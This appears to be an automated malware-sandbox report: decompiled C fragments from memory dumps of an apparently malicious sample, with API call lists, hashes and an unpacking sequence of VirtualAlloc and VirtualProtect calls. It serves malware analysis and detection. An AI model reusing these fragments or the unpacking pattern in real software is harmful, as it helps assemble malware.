                                                                                                            • API String ID: 1500278894-1536154274
                                                                                                            • Opcode ID: 63415c8ae04752870e794a641a1986ee3f2f0735ee4243343889b782660c537b
                                                                                                            • Instruction ID: 83a94ae1175f701d24d6355715f4430187a4e4f9ead9a893f8d293809a3efed8
                                                                                                            • Opcode Fuzzy Hash: 63415c8ae04752870e794a641a1986ee3f2f0735ee4243343889b782660c537b
                                                                                                            • Instruction Fuzzy Hash: FB018436211209BBDB21AFA9DC44EDF7BBCFF8A754F000426FA40AA150D671D914C750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 58%
                                                                                                            			E030327C7(void* __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				_Unknown_base(*)()* _t9;
                                                                                                            				signed int _t11;
                                                                                                            				intOrPtr _t12;
                                                                                                            				struct HINSTANCE__* _t14;
                                                                                                            				intOrPtr _t17;
                                                                                                            				intOrPtr _t20;
                                                                                                            
                                                                                                            				_t9 =  *0x303d2d8;
                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                            				_t20 =  *0x303d28c; // 0x2f0
                                                                                                            				if(_t9 != 0) {
                                                                                                            					L2:
                                                                                                            					if(_t20 != 0) {
                                                                                                            						_t11 =  *_t9(_t20,  &_v8);
                                                                                                            						if(_t11 == 0) {
                                                                                                            							_v8 = _v8 & _t11;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L5:
                                                                                                            					return _v8;
                                                                                                            				}
                                                                                                            				_t12 =  *0x303d2e0; // 0x22da5a8
                                                                                                            				_t3 = _t12 + 0x303e0af; // 0x4e52454b
                                                                                                            				_t14 = GetModuleHandleA(_t3);
                                                                                                            				_t17 =  *0x303d2e0; // 0x22da5a8
                                                                                                            				_t4 = _t17 + 0x303e9ea; // 0x6f577349
                                                                                                            				 *0x303d2ac = _t14;
                                                                                                            				_t9 = GetProcAddress(_t14, _t4);
                                                                                                            				 *0x303d2d8 = _t9;
                                                                                                            				if(_t9 == 0) {
                                                                                                            					goto L5;
                                                                                                            				}
                                                                                                            				goto L2;
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(4E52454B,00000000,?,?,030326C2,?,00000001,?,?,?,03031900,?), ref: 030327EB
                                                                                                            • GetProcAddress.KERNEL32(00000000,6F577349), ref: 03032804
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: Nxt
                                                                                                            • API String ID: 1646373207-3788892007
                                                                                                            • Opcode ID: 048dd80997d7f288b16878a30f3cfab1058db0eac2a57c138913c4c8dee070e7
                                                                                                            • Instruction ID: 447d7db3cb6ccf1ebbc506f8115f89d03d52c58dc17c51028feb3b90a4404c54
                                                                                                            • Opcode Fuzzy Hash: 048dd80997d7f288b16878a30f3cfab1058db0eac2a57c138913c4c8dee070e7
                                                                                                            • Instruction Fuzzy Hash: 62F06D7190730AEFDB45EBA9D944A9A73ECEB19314B140559E801E3248E778EA01CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03032291(CHAR* _a4) {
                                                                                                            				long _t9;
                                                                                                            				CHAR* _t10;
                                                                                                            
                                                                                                            				_t10 = 0;
                                                                                                            				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
                                                                                                            				if(_t9 != 0) {
                                                                                                            					_t10 = E030375F6(_t9);
                                                                                                            					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
                                                                                                            						E03034AAB(_t10);
                                                                                                            						_t10 = 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t10;
                                                                                                            			}






                                                                                                            APIs
                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,03031083,73797325), ref: 030322A2
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 030322BC
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentExpandHeapStrings$AllocateFree
                                                                                                            • String ID: PGxt
                                                                                                            • API String ID: 1564683301-789712160
                                                                                                            • Opcode ID: 390e6e7f06d8c0bd453b513a6c3ef4ef0476654d9aed5c723d298629747e74da
                                                                                                            • Instruction ID: 067e518613861dd285158b2bfd9a339f09f9f7abaf58aeb906587d056784cf3a
                                                                                                            • Opcode Fuzzy Hash: 390e6e7f06d8c0bd453b513a6c3ef4ef0476654d9aed5c723d298629747e74da
                                                                                                            • Instruction Fuzzy Hash: F2E04F32607632764232A9AB8C44E9FDEECEFE79F130A0525F908E6110DA10C801C2F4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 58%
                                                                                                            			E03031EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                            				intOrPtr* _v8;
                                                                                                            				void* _t17;
                                                                                                            				intOrPtr* _t22;
                                                                                                            				void* _t27;
                                                                                                            				char* _t30;
                                                                                                            				void* _t33;
                                                                                                            				void* _t34;
                                                                                                            				void* _t36;
                                                                                                            				void* _t37;
                                                                                                            				void* _t39;
                                                                                                            				int _t42;
                                                                                                            
                                                                                                            				_t17 = __eax;
                                                                                                            				_t37 = 0;
                                                                                                            				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                            				_t2 = _t17 + 1; // 0x1
                                                                                                            				_t28 = _t2;
                                                                                                            				_t34 = E030375F6(_t2);
                                                                                                            				if(_t34 != 0) {
                                                                                                            					_t30 = E030375F6(_t28);
                                                                                                            					if(_t30 == 0) {
                                                                                                            						E03034AAB(_t34);
                                                                                                            					} else {
                                                                                                            						_t39 = _a4;
                                                                                                            						_t22 = E0303A971(_t39);
                                                                                                            						_v8 = _t22;
                                                                                                            						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                            							_a4 = _t39;
                                                                                                            						} else {
                                                                                                            							_t26 = _t22 + 2;
                                                                                                            							_a4 = _t22 + 2;
                                                                                                            							_t22 = E0303A971(_t26);
                                                                                                            							_v8 = _t22;
                                                                                                            						}
                                                                                                            						if(_t22 == 0) {
                                                                                                            							__imp__(_t34, _a4);
                                                                                                            							 *_t30 = 0x2f;
                                                                                                            							 *((char*)(_t30 + 1)) = 0;
                                                                                                            						} else {
                                                                                                            							_t42 = _t22 - _a4;
                                                                                                            							memcpy(_t34, _a4, _t42);
                                                                                                            							 *((char*)(_t34 + _t42)) = 0;
                                                                                                            							__imp__(_t30, _v8);
                                                                                                            						}
                                                                                                            						 *_a8 = _t34;
                                                                                                            						_t37 = 1;
                                                                                                            						 *_a12 = _t30;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t37;
                                                                                                            			}















                                                                                                            APIs
                                                                                                            • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,03035405,00000000,00000000,747C81D0,05319618,?,?,03032A8A,?,05319618), ref: 03031ECD
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                              • Part of subcall function 0303A971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,03031EFB,00000000,00000001,00000001,?,?,03035405,00000000,00000000,747C81D0,05319618), ref: 0303A97F
                                                                                                              • Part of subcall function 0303A971: StrChrA.SHLWAPI(?,0000003F,?,?,03035405,00000000,00000000,747C81D0,05319618,?,?,03032A8A,?,05319618,0000EA60,?), ref: 0303A989
                                                                                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03035405,00000000,00000000,747C81D0,05319618,?,?,03032A8A), ref: 03031F2B
                                                                                                            • lstrcpy.KERNEL32(00000000,747C81D0), ref: 03031F3B
                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 03031F47
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3767559652-0
                                                                                                            • Opcode ID: 4650362c418853e7feb567acac1ff0d6f61db1108be2472892187d10b48ac9cb
                                                                                                            • Instruction ID: c49b0b8029cd3822620bac54a5dca5b58f5ea15ee06328496b1a087b2b77c9e3
                                                                                                            • Opcode Fuzzy Hash: 4650362c418853e7feb567acac1ff0d6f61db1108be2472892187d10b48ac9cb
                                                                                                            • Instruction Fuzzy Hash: 7A218E76506295EFCB06EF64C844AAABFEDAF4B680B054054F9049F212D775D90087A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0303131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                            				void* _v8;
                                                                                                            				void* _t18;
                                                                                                            				int _t25;
                                                                                                            				int _t29;
                                                                                                            				int _t34;
                                                                                                            
                                                                                                            				_t29 = lstrlenW(_a4);
                                                                                                            				_t25 = lstrlenW(_a8);
                                                                                                            				_t18 = E030375F6(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                            				_v8 = _t18;
                                                                                                            				if(_t18 != 0) {
                                                                                                            					_t34 = _t29 + _t29;
                                                                                                            					memcpy(_t18, _a4, _t34);
                                                                                                            					_t10 = _t25 + 2; // 0x2
                                                                                                            					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                            				}
                                                                                                            				return _v8;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,05319364,?,030350AD,004F0053,05319364,?,?,?,?,?,?,030354EF), ref: 0303132E
                                                                                                            • lstrlenW.KERNEL32(030350AD,?,030350AD,004F0053,05319364,?,?,?,?,?,?,030354EF), ref: 03031335
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,030350AD,004F0053,05319364,?,?,?,?,?,?,030354EF), ref: 03031355
                                                                                                            • memcpy.NTDLL(747869A0,030350AD,00000002,00000000,004F0053,747869A0,?,?,030350AD,004F0053,05319364), ref: 03031368
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 2411391700-0
                                                                                                            • Opcode ID: 5011e56f5f29a731942f0a6b5b766f0fe597b501fc3dcf88d0e361aaab4564aa
                                                                                                            • Instruction ID: be6bfef6278a0c7f5a4b29ec0f9d00fb4d877852c5657d5979642293fc4cd5f4
                                                                                                            • Opcode Fuzzy Hash: 5011e56f5f29a731942f0a6b5b766f0fe597b501fc3dcf88d0e361aaab4564aa
                                                                                                            • Instruction Fuzzy Hash: 4FF0497A902118BBCF15EFA9CC84CCF7BACEF4A2947054462FD04DB201E631EA108BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • lstrlen.KERNEL32(05319B10,00000000,00000000,770CC740,0303467E,00000000), ref: 030338DA
                                                                                                            • lstrlen.KERNEL32(?), ref: 030338E2
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • lstrcpy.KERNEL32(00000000,05319B10), ref: 030338F6
                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 03033901
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 74227042-0
                                                                                                            • Opcode ID: f16ad0dd5b9a47f101d36696db461b5d80842db8ea676d7467b288832a28b208
                                                                                                            • Instruction ID: a6c284412b574a5cbfa68e5f98f218d3f5eae873abcc946478415a33b59e6f8b
                                                                                                            • Opcode Fuzzy Hash: f16ad0dd5b9a47f101d36696db461b5d80842db8ea676d7467b288832a28b208
                                                                                                            • Instruction Fuzzy Hash: 0FE09277503260A78711EBE8AC48C9BBBACEF8A6503040416F600E3104C728D8018BA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Executed Functions

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNELBASE(00000000,000008C9,00003000,00000040,000008C9,6F0DDA28), ref: 6F0DE097
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6F0DDA88), ref: 6F0DE0CE
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6F0DE12E
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F0DE164
                                                                                                            • VirtualProtect.KERNEL32(6F030000,00000000,00000004,6F0DDFB9), ref: 6F0DE269
                                                                                                            • VirtualProtect.KERNEL32(6F030000,00001000,00000004,6F0DDFB9), ref: 6F0DE290
                                                                                                            • VirtualProtect.KERNEL32(00000000,?,00000002,6F0DDFB9), ref: 6F0DE35D
                                                                                                            • VirtualProtect.KERNEL32(00000000,?,00000002,6F0DDFB9,?), ref: 6F0DE3B3
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F0DE3CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.633457637.000000006F0DD000.00000040.00020000.sdmp, Offset: 6F0DD000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$Protect$Alloc$Free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2574235972-0
                                                                                                            • Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                            • Instruction ID: 2512d9ebc86b1d5572e1fe27dd23102369d4e81253cfc23d2c29ea2b3eba83e7
                                                                                                            • Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                            • Instruction Fuzzy Hash: 62D158726206209FDB12CF18CD80B5677E7EF48B92F0841A5ED4A9F35AD770BA41CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6F045696
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,6F0DB7A0,000008BB), ref: 6F04576F
                                                                                                              • Part of subcall function 6F0472B0: task.LIBCPMTD ref: 6F047352
                                                                                                              • Part of subcall function 6F04BA20: swap.LIBCPMTD ref: 6F04BA39
                                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6F0C7144,?,?,?,?,?,00000000), ref: 6F045950
                                                                                                            • std::locale::locale.LIBCPMTD ref: 6F0459D8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                            • String ID: ?
                                                                                                            • API String ID: 756721536-1684325040
                                                                                                            • Opcode ID: 80f1fa31fab8db82761f2dd60790cbfbb4312e20bb01cc056dde5a4f9ee2e9d0
                                                                                                            • Instruction ID: 2f6f9adb6c59c61e1ddf97a80f01413311ca98bf2b66b52aad743d6f9d658509
                                                                                                            • Opcode Fuzzy Hash: 80f1fa31fab8db82761f2dd60790cbfbb4312e20bb01cc056dde5a4f9ee2e9d0
                                                                                                            • Instruction Fuzzy Hash: A8522FB1D00616CFCB08DF69DD90BA9BBB2FB4A314F208129D90597396D7385859EF48
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,6F0DC338,000008BB), ref: 6F04D345
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID: 1$N
                                                                                                            • API String ID: 514040917-3127171972
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,6F0DA0D4,00000000), ref: 6F0914AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RtlEncodePointer.NTDLL(?), ref: 6F055C69
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: EncodePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2118026453-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,jo,00000002,00000000,?,?,?,6F09EB6A,?,00000000), ref: 6F09E8E5
                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,jo,00000002,00000000,?,?,?,6F09EB6A,?,00000000), ref: 6F09E90E
                                                                                                            • GetACP.KERNEL32(?,?,6F09EB6A,?,00000000), ref: 6F09E923
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: ACP$OCP$jo
                                                                                                            • API String ID: 2299586839-1723675111
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,6F0925B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6F09E163
                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6F0925B5,?,?,?,00000055,?,-00000050,?,?), ref: 6F09E18E
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 6F09E222
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 6F09E230
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6F09E2F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                            • String ID:
                                                                                                            • API String ID: 4147378913-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                              • Part of subcall function 6F08F299: _free.LIBCMT ref: 6F08F2FB
                                                                                                              • Part of subcall function 6F08F299: _free.LIBCMT ref: 6F08F331
                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6F09EB2D
                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 6F09EB76
                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 6F09EB85
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6F09EBCD
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6F09EBEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 949163717-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 1918051841-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F056FAE
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F056FB8
                                                                                                            • int.LIBCPMT ref: 6F056FCF
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • codecvt.LIBCPMT ref: 6F056FF2
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057009
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057029
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057036
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057043
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05704D
                                                                                                            • int.LIBCPMT ref: 6F057064
                                                                                                            • collate.LIBCPMT ref: 6F057087
                                                                                                              • Part of subcall function 6F059346: __EH_prolog3_GS.LIBCMT ref: 6F05934D
                                                                                                              • Part of subcall function 6F059346: __Getcoll.LIBCPMT ref: 6F0593B1
                                                                                                              • Part of subcall function 6F059346: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F0593CD
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05709E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0570BE
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0570CB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register$GetcollH_prolog3_LocinfoLocinfo::~_codecvtcollate
                                                                                                            • String ID:
                                                                                                            • API String ID: 348717968-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057202
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05720C
                                                                                                            • int.LIBCPMT ref: 6F057223
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • ctype.LIBCPMT ref: 6F057246
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05725D
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F05727D
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05728A
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057297
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0572A1
                                                                                                            • int.LIBCPMT ref: 6F0572B8
                                                                                                            • messages.LIBCPMT ref: 6F0572DB
                                                                                                              • Part of subcall function 6F05956A: __EH_prolog3.LIBCMT ref: 6F059571
                                                                                                              • Part of subcall function 6F05956A: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F0595C4
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0572F2
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057312
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05731F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register$LocinfoLocinfo::~_ctypemessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 4204488167-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0570D8
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0570E2
                                                                                                            • int.LIBCPMT ref: 6F0570F9
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • collate.LIBCPMT ref: 6F05711C
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057133
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057153
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057160
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05716D
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057177
                                                                                                            • int.LIBCPMT ref: 6F05718E
                                                                                                            • ctype.LIBCPMT ref: 6F0571B1
                                                                                                              • Part of subcall function 6F05948A: __EH_prolog3.LIBCMT ref: 6F059491
                                                                                                              • Part of subcall function 6F05948A: ctype.LIBCPMT ref: 6F0594D9
                                                                                                              • Part of subcall function 6F05948A: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F0594EC
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0571C8
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0571E8
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0571F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
